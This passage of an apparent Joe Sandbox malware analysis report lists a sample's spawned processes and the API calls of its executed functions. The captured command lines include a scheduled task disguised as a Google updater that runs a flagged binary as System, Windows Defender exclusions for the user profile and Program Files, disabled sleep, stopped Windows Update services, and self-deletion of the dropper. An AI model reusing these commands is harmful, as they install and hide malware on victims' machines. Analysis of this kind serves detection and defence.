Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff695fe0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:29:57
Start date:	09/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6a42c0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	10:29:57
Start date:	09/10/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-dc 0
Imagebase:	0x7ff6f0da0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:29:57
Start date:	09/10/2024
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff661590000
File size:	944'128 bytes
MD5 hash:	A987B43E6A8E8F894B98A3DF022DB518
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	10:29:57
Start date:	09/10/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-ac 0
Imagebase:	0x7ff6f0da0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:29:57
Start date:	09/10/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff6f0da0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	10:29:57
Start date:	09/10/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff618e70000
File size:	59'448 bytes
MD5 hash:	15A556DEF233F112D127025AB51AC2D3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	10:29:58
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase:	0x7ff6d52a0000
File size:	57'360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	10:29:58
Start date:	09/10/2024
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	"dwm.exe"
Imagebase:	0x7ff7994b0000
File size:	94'720 bytes
MD5 hash:	5C27608411832C5B39BA04E33D53536C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	10:30:03
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase:	0x7ff6d52a0000
File size:	57'360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	10:30:04
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff6d52a0000
File size:	57'360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	10:30:04
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase:	0x7ff6d52a0000
File size:	57'360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	10:30:05
Start date:	09/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"
Imagebase:	0x7ff7e5d60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	10:30:05
Start date:	09/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6a42c0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	10:30:05
Start date:	09/10/2024
Path:	C:\Program Files\Google\Chrome\updater.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\updater.exe"
Imagebase:	0x140000000
File size:	20'970'496 bytes
MD5 hash:	413E4E7BC129E8165D1FFD2B1AE5DB04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 29%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	10:30:05
Start date:	09/10/2024
Path:	C:\Windows\System32\choice.exe
Wow64 process (32bit):	false
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0x7ff774650000
File size:	35'840 bytes
MD5 hash:	1A9804F0C374283B094E9E55DC5EE128
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	10:30:05
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
Imagebase:	0x7ff6d52a0000
File size:	57'360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	10:30:06
Start date:	09/10/2024
Path:	C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe
Imagebase:	0x7ff6190e0000
File size:	365'360 bytes
MD5 hash:	B6BAD2BD8596D9101874E9042B8E2D63
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	10:30:06
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
Imagebase:	0x7ff6d52a0000
File size:	57'360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	10:30:07
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
Imagebase:	0x7ff6d52a0000
File size:	57'360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	10:30:07
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
Imagebase:	0x7ff6d52a0000
File size:	57'360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	10:30:08
Start date:	09/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff695fe0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	10:30:08
Start date:	09/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6a42c0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	10:30:08
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
Imagebase:	0x7ff6d52a0000
File size:	57'360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	10:30:09
Start date:	09/10/2024
Path:	C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe
Imagebase:	0x7ff6e6ea0000
File size:	521'536 bytes
MD5 hash:	3B0DF35583675DE5A08E8D4C1271CEC0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	10:30:10
Start date:	09/10/2024
Path:	C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe
Imagebase:	0x7ff711120000
File size:	399'664 bytes
MD5 hash:	91038D45A86B5465E8B7E5CD63187150
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	10:30:10
Start date:	09/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7bed40000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	50
Start time:	10:30:10
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
Imagebase:	0x7ff6d52a0000
File size:	57'360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	51
Start time:	10:30:11
Start date:	09/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Imagebase:	0x7ff7e5d60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	10:30:11
Start date:	09/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6a42c0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	10:30:11
Start date:	09/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
Imagebase:	0x7ff6d52a0000
File size:	57'360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	54
Start time:	10:30:11
Start date:	09/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff7fa3b0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	10:30:11
Start date:	09/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff7fa3b0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	10:30:11
Start date:	09/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff731b80000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	10:30:11
Start date:	09/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff7fa3b0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	46%
Total number of Nodes:	87
Total number of Limit Nodes:	15

Executed Functions

Function 00000125D4012CDC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 264
stringfilelibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDeviceIoControlFile.NTDLL ref: 00000125D4012D47
GetModuleHandleA.KERNEL32 ref: 00000125D4012D80
lstrlenW.KERNEL32 ref: 00000125D4012FBA

Part of subcall function 00000125D4011A14: OpenProcess.KERNEL32 ref: 00000125D4011A3A
Part of subcall function 00000125D4011A14: K32GetModuleFileNameExW.KERNEL32 ref: 00000125D4011A58
Part of subcall function 00000125D4011A14: PathFindFileNameW.SHLWAPI ref: 00000125D4011A67
Part of subcall function 00000125D4011A14: lstrlenW.KERNEL32 ref: 00000125D4011A73
Part of subcall function 00000125D4011A14: StrCpyW.SHLWAPI ref: 00000125D4011A86
Part of subcall function 00000125D4011A14: CloseHandle.KERNEL32 ref: 00000125D4011A94

GetProcAddress.KERNEL32 ref: 00000125D4012D95

Part of subcall function 00000125D4011554: StrCmpIW.SHLWAPI ref: 00000125D4011585

Part of subcall function 00000125D4013930: StrCmpNIW.SHLWAPI ref: 00000125D4013948

StrCmpNIW.SHLWAPI ref: 00000125D4012DD8
lstrlenW.KERNEL32 ref: 00000125D4012F00

Strings

\Device\Nsi, xrefs: 00000125D4012DCB
NtQueryObject, xrefs: 00000125D4012D8B
ntdll.dll, xrefs: 00000125D4012D79

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: Filelstrlen$HandleModuleName$AddressCloseControlDeviceFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 1201441540-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: a798f0d261e512d238e339c324b3d4e172a738115e7c3c4c9897d560935a9e69
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 1DB1AE32212E9882FB599FA5D4D07F96BA6F744B84F94502AEE09AB794DF35CC60C340

Function 00000125D40123F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 52
filethreadnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000125D4012405
GetCurrentProcessId.KERNEL32 ref: 00000125D401240F
NtResumeThread.NTDLL ref: 00000125D40124C4

Part of subcall function 00000125D40119AC: OpenProcess.KERNEL32 ref: 00000125D40119CA
Part of subcall function 00000125D40119AC: IsWow64Process.KERNEL32 ref: 00000125D40119E0
Part of subcall function 00000125D40119AC: CloseHandle.KERNEL32 ref: 00000125D40119FB

CreateFileW.KERNEL32 ref: 00000125D4012468
WriteFile.KERNEL32 ref: 00000125D4012490
ReadFile.KERNEL32 ref: 00000125D40124AF
CloseHandle.KERNEL32 ref: 00000125D40124B8

Strings

\\.\pipe\dialerchildproc64, xrefs: 00000125D4012438
\\.\pipe\dialerchildproc32, xrefs: 00000125D401243F

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: Process$File$CloseHandleThread$CreateCurrentOpenReadResumeWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2222519123-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: b474440931993bcaf41c8731280be646a53f0584e153a076b225260281b40078
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 49214135614B4893F7108B65F4D43EA7BA6F789BA4F904215DA594ABE8CF3CC159CF00

Function 00000125D40130B4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 95
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000125D40130D7
RtlAllocateHeap.NTDLL ref: 00000125D40130EA
NtQuerySystemInformation.NTDLL(?,?,?,?,?,00000125D40123A7), ref: 00000125D4013101
StrCmpNIW.SHLWAPI ref: 00000125D401316B
GetProcessHeap.KERNEL32 ref: 00000125D40131D1
HeapFree.KERNEL32 ref: 00000125D40131DF

Strings

dialer, xrefs: 00000125D4013164

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: Heap$Process$AllocateFreeInformationQuerySystem
String ID: dialer
API String ID: 4073547687-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 21130b20d2e9a006f1e02b6f3ab3178ccd056863f786049b04cb6cfafb8fc06f
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 82318231702F5992FB159F96A8842F9ABAAFB84B94F8441209E484BB54EB38D4B58700

Function 00000125D40121CC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQuerySystemInformation.NTDLL ref: 00000125D40121F7
StrCmpNIW.SHLWAPI ref: 00000125D4012270

Part of subcall function 00000125D40130B4: GetProcessHeap.KERNEL32 ref: 00000125D40130D7
Part of subcall function 00000125D40130B4: RtlAllocateHeap.NTDLL ref: 00000125D40130EA
Part of subcall function 00000125D40130B4: NtQuerySystemInformation.NTDLL(?,?,?,?,?,00000125D40123A7), ref: 00000125D4013101
Part of subcall function 00000125D40130B4: StrCmpNIW.SHLWAPI ref: 00000125D401316B
Part of subcall function 00000125D40130B4: GetProcessHeap.KERNEL32 ref: 00000125D40131D1
Part of subcall function 00000125D40130B4: HeapFree.KERNEL32 ref: 00000125D40131DF

Strings

dialer, xrefs: 00000125D4012269
S, xrefs: 00000125D4012391

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: Heap$InformationProcessQuerySystem$AllocateFree
String ID: S$dialer
API String ID: 1053149212-3873981283
Opcode ID: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
Instruction ID: 1cab8037f6f5fcc83a8a22dbf3f84ecb9275b963d21d4cb1ccc6690f8ba3cd9f
Opcode Fuzzy Hash: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
Instruction Fuzzy Hash: 2D51B132B12F2C96E764CBA594846FD7BA6F704784F849819EE45BBB84DB34C871C300

Function 00007FF95A53DCD8 Relevance: 6.1, Strings: 1, Instructions: 4898COMMON

Download Yara Rule

Strings

T_H, xrefs: 00007FF95A53DDFF

Memory Dump Source

Source File: 00000000.00000002.11929439531.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff95a530000_zufmUwylvo.jbxd

Similarity

API ID:
String ID: T_H
API String ID: 0-97390371
Opcode ID: 909088a2cbf2eb4658a091581d2f2003d087198f3fee2f94fc4a1486f5850b6a
Instruction ID: 558a4ee05f621a07a3c538cd25ed6cba84dd5c454c8ec4f3b1e5c64d5ae5704a
Opcode Fuzzy Hash: 909088a2cbf2eb4658a091581d2f2003d087198f3fee2f94fc4a1486f5850b6a
Instruction Fuzzy Hash: 6973A131B1894A4FE794EB2C94597B977D2EFD9300F1805BAD00DC72A6DE79BD428B02

Function 00000125D4012A7C Relevance: 3.1, APIs: 2, Instructions: 64
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtEnumerateValueKey.NTDLL ref: 00000125D4012ABB
NtEnumerateValueKey.NTDLL ref: 00000125D4012AEF

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: EnumerateValue
String ID:
API String ID: 1749906896-0
Opcode ID: f0e10426e681e7f6cf899e4393c9bf8be204e3db0faa1dd7183fda82dc324521
Instruction ID: 89fb0b6591ccb916a033ca99e86f11bf1347409355d1e16078260f61467a039f
Opcode Fuzzy Hash: f0e10426e681e7f6cf899e4393c9bf8be204e3db0faa1dd7183fda82dc324521
Instruction Fuzzy Hash: 9D11B432205F4882E761DF96B8C0AEABBA5F394B94F800029EE45D7750EF34D462C744

Function 00007FF95A54C3EC Relevance: 1.6, APIs: 1, Instructions: 111processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF95A54C483

Memory Dump Source

Source File: 00000000.00000002.11929439531.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff95a530000_zufmUwylvo.jbxd

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: c753dd688f039d274d58710f06481aaa62c3bba43a6ea08ea8c38e2bf20065f0
Instruction ID: f950cda0394031874c4f0857031b8aa8a7051c87f20edfa1996113a1bc7fa39f
Opcode Fuzzy Hash: c753dd688f039d274d58710f06481aaa62c3bba43a6ea08ea8c38e2bf20065f0
Instruction Fuzzy Hash: F921D53291CB584FEB28EFAC984A6FD7BE0EB5A321F00417FD08EC3152DA6465468781

Function 00007FF95A54F9F0 Relevance: .8, Instructions: 850COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.11929439531.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff95a530000_zufmUwylvo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10de3b81c5e121ed8c060359055e1b190d3b0399d7fb36ca1c22188c67743058
Instruction ID: 99f8c27c93f14028feb2ea2abfbfa404452c87a770bcea19036a2fab9170c5ef
Opcode Fuzzy Hash: 10de3b81c5e121ed8c060359055e1b190d3b0399d7fb36ca1c22188c67743058
Instruction Fuzzy Hash: 8642C030A18A094FEB58EB18C885ABDB3E1FF99300F5445B9D44EC7296DE75F8438B85

Function 00007FF95A53AF46 Relevance: .5, Instructions: 476COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.11929439531.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff95a530000_zufmUwylvo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98df77b28d5e02885a81663b7589dbf0ec974faed439cb6d6c7d4d854c849da5
Instruction ID: 1b54ae66426b3f95573eaab5c87cfa7ad203652016663a84a88c321435963fff
